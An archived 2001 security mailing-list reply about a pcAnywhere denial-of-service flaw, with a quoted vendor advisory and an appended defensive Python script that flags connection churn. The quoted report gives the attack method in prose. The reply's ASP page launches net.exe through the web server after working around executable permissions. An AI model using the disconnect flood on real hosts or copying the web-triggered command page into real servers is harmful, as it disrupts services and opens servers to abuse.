Re: pcAnywhere Remote DoS

From: Steven Tracy (Steven@PRIMACOMPUTER.COM)
Date: 08/14/01


Message-ID:  <5.0.0.25.0.20010814123149.034328e0@mail.primacomputer.com>
Date:         Tue, 14 Aug 2001 12:49:52 +0800
From: Steven Tracy <Steven@PRIMACOMPUTER.COM>
Subject:      Re: pcAnywhere Remote DoS
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I run most of my web servers behind firewalls, or at least with most
services unbound, so pcAnywhere is one of the few options I have to admin
the machines short of going to site.

One way I have used to work around this, and other problems, is with a small
ASP page that uses WSH to start/stop a service. Something like this:

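<HTML>
<BODY>
Running Command<BR>
<%
     ' Create a Windows Script Host shell object to launch the command
     set wshell = server.createobject("wscript.shell")
     ' Start the awhost32 service using the copy of net.exe kept outside the web root
     wshell.run "e:\le303mkjd9rnbs9\net start awhost32"
     set wshell = nothing
%>
Command Run<BR>
</BODY>
</HTML>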

The "e:\le303mkjd9rnbs9\" is a directory outside the web root that contains
a copy of net.exe, and any other things I need. Most executables under
%SystemRoot% are Interactive:RX,Admin:F, and therefore cannot be run by
IUSR_xxxx, or System.

Best Regards,
Steven Tracy

At 09:21 PM 13-08-01, Sym Security wrote:
>Wed, 1 Aug 2001 14:17:35 -0400, John Thornton reported:
>
>Subject: pcAnywhere Remote DoS
>Comments: To: bugtraq@securityfocus.com
>Content-Type: text/plain; charset=iso-8859-1
>
>
>Tested on pcAnywhere 9.2, it seems if you connect then disconnect to
>pcAnywhere host service about 300 - 500 times the service will stop
>responding. The only way to get it to respond is to restart the service.
>The latest version of pcAnywhere is 10 and we don't have it but I would
>imagine it has the same problems.
>
>John Thornton Editor-In-Chief www.hackersdigest.com
>
>------------------------------------
>
>This issue was addressed in a later version of pcAnywhere than the one
>referenced here. The original issue was reported
> in a CIAC Security Bulletin, 5 March, 2001
>
> L-055: pcAnywhere Denial of Service, abnormal server connection
>http://ciac.llnl.gov/ciac/bulletins/l-055.shtml
>
>The fix for this issue is available in a LiveUpdate for pcAnywhere 9.2.1 and
>10.0 and is also available as a downloadable patch. See SARC Security
>Alert, 5 March, 2001
>Subj: pcAnywhere, Denial of Service, abnormal server connection
>
>http://service1.symantec.com/sarc/sarc.nsf/info/html/pcAnywhere.Denial.of.Service.html
>
>
>Security issues related to Symantec products can be reported to
>symsecurity@symantec.com to ensure timely response.
>
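
Added example, not part of the original messages: a defender-side check that flags the connect/disconnect churn described in the quoted report by counting short-lived connections per source in a connection log. The log line format, TCP port 5631, the 10-minute window and the threshold of 100 are assumptions, and the sample data is constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

PCA_PORT = 5631                  # assumed pcAnywhere TCP data port; not stated in the thread
WINDOW = timedelta(minutes=10)   # assumed look-back window
THRESHOLD = 100                  # assumed alert level, below the 300-500 cycles reported

def parse(line):
    """Parse a constructed log line: '<ISO time> <src ip> <dst port> <seconds open>'."""
    ts, src, port, dur = line.split()
    return datetime.fromisoformat(ts), src, int(port), float(dur)

def find_churn(lines, max_duration=2.0):
    """Return {src: peak count} for sources whose short-lived connections to
    PCA_PORT reach THRESHOLD inside any WINDOW. Lines must be in time order."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            ts, src, port, dur = parse(line)
        except ValueError:
            continue  # skip malformed lines rather than abort the scan
        if port != PCA_PORT or dur > max_duration:
            continue  # another service, or a real admin session
        q = recent[src]
        q.append(ts)
        while ts - q[0] > WINDOW:
            q.popleft()  # drop connections that fell out of the window
        if len(q) >= THRESHOLD:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: one source cycling every second, one long admin session."""
    start = datetime(2001, 8, 14, 12, 0, 0)
    lines = [f"{(start + timedelta(seconds=i)).isoformat()} 192.0.2.10 5631 0.2"
             for i in range(350)]
    lines.append(f"{start.isoformat()} 198.51.100.7 5631 1800")
    lines.append("garbage line")
    return lines

if __name__ == "__main__":
    for src, peak in find_churn(sample_log()).items():
        print(f"{src}: {peak} short connections to port {PCA_PORT} within {WINDOW}")
```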


